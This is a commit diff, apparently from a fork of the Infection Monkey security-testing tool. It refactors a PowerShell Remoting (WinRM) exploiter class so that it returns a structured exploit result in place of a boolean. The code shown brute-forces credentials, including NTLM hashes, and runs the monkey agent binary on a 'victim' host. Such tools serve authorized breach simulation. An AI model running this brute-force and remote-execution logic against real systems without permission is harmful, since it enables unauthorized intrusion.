forked from p15670423/monkey
Agent: Return ExploitResultData in Powershell exploit
This commit is contained in:
parent
7d2f9251e7
commit
d1e29ed66e
|
@ -39,8 +39,8 @@ class PowerShellExploiter(HostExploiter):
|
|||
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
||||
_EXPLOITED_SERVICE = "PowerShell Remoting (WinRM)"
|
||||
|
||||
def __init__(self, host: VictimHost):
|
||||
super().__init__(host)
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self._client = None
|
||||
|
||||
def _exploit_host(self):
|
||||
|
@ -48,7 +48,7 @@ class PowerShellExploiter(HostExploiter):
|
|||
use_ssl = self._is_client_using_https()
|
||||
except PowerShellRemotingDisabledError as e:
|
||||
logging.info(e)
|
||||
return False
|
||||
return self.exploit_result
|
||||
|
||||
credentials = get_credentials(
|
||||
self.options["credentials"]["exploit_user_list"],
|
||||
|
@ -57,13 +57,19 @@ class PowerShellExploiter(HostExploiter):
|
|||
self.options["credentials"]["exploit_ntlm_hash_list"],
|
||||
is_windows_os(),
|
||||
)
|
||||
|
||||
auth_options = [get_auth_options(creds, use_ssl) for creds in credentials]
|
||||
|
||||
self._client = self._authenticate_via_brute_force(credentials, auth_options)
|
||||
if not self._client:
|
||||
return False
|
||||
return self.exploit_result
|
||||
|
||||
return self._execute_monkey_agent_on_victim()
|
||||
result_execution = self._execute_monkey_agent_on_victim()
|
||||
|
||||
self.exploit_result.exploitation_success = result_execution
|
||||
self.exploit_result.propagation_success = result_execution
|
||||
|
||||
return self.exploit_result
|
||||
|
||||
def _is_client_using_https(self) -> bool:
|
||||
try:
|
||||
|
@ -180,17 +186,6 @@ class PowerShellExploiter(HostExploiter):
|
|||
with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as f:
|
||||
f.write(agent_binary_bytes.getvalue())
|
||||
|
||||
def _write_virtual_file_to_local_path(self) -> None:
|
||||
"""
|
||||
# TODO: monkeyfs has been removed. Fix this in issue #1740.
|
||||
monkey_fs_path = get_target_monkey_by_os(is_windows=True, is_32bit=self.is_32bit)
|
||||
|
||||
with monkeyfs.open(monkey_fs_path) as monkey_virtual_file:
|
||||
with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file:
|
||||
monkey_local_file.write(monkey_virtual_file.read())
|
||||
"""
|
||||
pass
|
||||
|
||||
def _run_monkey_executable_on_victim(self, executable_path) -> None:
|
||||
monkey_execution_command = build_monkey_execution_command(
|
||||
self.host, get_monkey_depth() - 1, executable_path
|
||||
|
|
Loading…
Reference in New Issue